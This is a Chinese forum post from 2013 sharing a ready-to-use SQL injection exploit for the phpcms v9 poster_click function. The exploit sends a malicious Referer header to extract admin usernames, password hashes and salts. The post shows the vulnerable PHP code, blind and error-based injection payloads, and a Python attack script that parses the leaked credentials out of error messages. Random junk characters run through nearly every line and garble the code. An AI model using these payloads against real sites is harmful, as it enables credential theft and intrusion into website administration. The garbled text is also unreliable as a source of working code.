有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
3 k- X/ G- }8 y5 u% a- f/ Z7 F+ Q
问题函数\phpcms\modules\poster\index.php' a& ]4 |$ M3 F) @3 K& v! B4 y
4 A; `) \! v7 }, G0 X( tpublic function poster_click() {
5 h2 h" ?' j* e& k# o+ k$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
0 M9 a" ?& t' E" O9 X8 ^) X$r = $this->db->get_one(array('id'=>$id));" k+ b/ b5 U( A# a. R- p$ x+ J
if (!is_array($r) && empty($r)) return false;6 C# @4 m% K7 x, r) ~+ [. y
$ip_area = pc_base::load_sys_class('ip_area');7 M/ S) i# G: L7 u
$ip = ip();- M6 I& X" H9 W4 M m6 U+ D
$area = $ip_area->get($ip);- y$ T8 X" z6 ^( ~
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
" N) Y4 h# m+ W* I. Tif($id) {
! Y# W! {- t* S7 M$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
/ }# K5 A5 Q6 L) ]" m! P$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
. I5 F3 x# k o+ }$ q}
5 E2 G. x4 y P" j. {' z$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
. A$ Y( O. f) d* z2 e$setting = string2array($r['setting']);
* U* T& l1 G$ K1 H9 d7 aif (count($setting)==1) {
! z5 x, o- B' A2 c& F$url = $setting['1']['linkurl'];
+ ?" o) c- o4 ]5 h} else {/ w9 A) i, B+ I7 u% Y" t) p+ d3 M
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];$ j! o, P! N0 g3 ~
}
- Z3 ], P7 \! theader('Location: '.$url);* A' n- u1 L2 N$ I' E0 l' R
}
4 c n4 I; T0 J6 v3 n1 z; K
( ~7 k/ N- r& O4 C' P4 E! W5 w. w
7 w3 m! C& ~# F. R3 }, Y8 d4 P
' U$ S8 a! l/ J* v1 a5 ^, S4 N利用方式:
2 k7 V1 x+ E# j
! O- ~& a8 _: u0 Y8 h3 U1、可以采用盲注入的手法:
/ ?: p+ M, e* s: y+ W1 `. w! B* H3 O9 G& ^
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#5 y% k5 W2 d" e) t p+ o9 Q7 n
! o# U+ {: M9 G
通过返回页面,正常与否一个个猜解密码字段。- Y1 u$ \7 l+ b0 ]4 r6 R1 w
. v) m# J6 D2 |! `4 M& @* ^5 l2、代码是花开写的,随手附上了:/ k& m/ x6 B' L+ M; w9 q8 X# [
, s! j2 ]+ |" e2 K5 O3 J
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
/ Q5 O! r) z1 O6 w" k3 a& k5 _8 P/ M, D- m1 o( j) V
此方法是爆错注入手法,原理自查。% l3 p1 x3 M# o1 p! _; }
4 ]% n4 Y( [- H8 ^, F: T; L! z
- s9 @$ J# M# J _5 w7 P2 b! E) \8 c1 T G
利用程序:
6 s! `, s7 S! n! L
% R$ M& U0 b+ k/ I" t0 D9 J' \! a: y#!/usr/bin/env python
; t/ j; Z# |8 w$ ]/ |import httplib,sys,re
6 H3 n1 j, v' c# D
5 q6 O! N& n( L" Z5 H5 D# Q7 _# Edef attack():/ O: _8 g" {6 g. U4 i0 n
print “Code by Pax.Mac Team conqu3r!”. i- u e5 a* d3 [. u
print “Welcome to our zone!!!”/ N+ c H* P8 l# o: n/ U# S9 r X* b
url=sys.argv[1]! v- f5 u) L% B- o
paths=sys.argv[2]* U0 e4 w6 e* e
conn = httplib.HTTPConnection(url)# _# ~: x: b3 f; p
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
( N: E$ F3 ?8 g2 Z; m“Accept”: “text/plain”,7 l+ p3 F5 t( F; a
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}4 f& s; U+ [9 H. G& n6 l9 c u
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
9 z" l& \. y6 P+ wr1 = conn.getresponse()
- Y; f6 m8 O0 Y. s Bdatas=r1.read()
. |: P1 v0 [) p+ b3 p3 O: r: bdatas=re.findall(r”Duplicate entry \’\w+’”, datas)1 Q& L: n" v, Y, j
print datas[0]
) T9 O+ D8 S# G" I4 C1 j# jconn.close()! V3 N b. E1 L1 b. V: t
if __name__==”__main__”:$ S; Y- B+ x$ X5 [& K3 ]
if len(sys.argv)<3:
3 w4 ]4 |3 C. ~# b7 iprint “Code by Pax.Mac Team conqu3r”0 ?' f+ s7 d* P0 w* d+ {3 ~
print “Usgae:”3 a5 C+ x# k# u% ~8 y7 v/ c
print “ phpcmsattack.py www.paxmac.org /”! a z: l- n( W" a
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”0 s4 I0 G. Q3 Z
sys.exit(1)4 m+ C# W; G c, K8 i3 O( Q
attack()8 L$ j4 y+ P' e) E
. p4 Q* ]1 @% b3 F
|
发表于 2013-1-11 21:01:00
收藏
支持
反对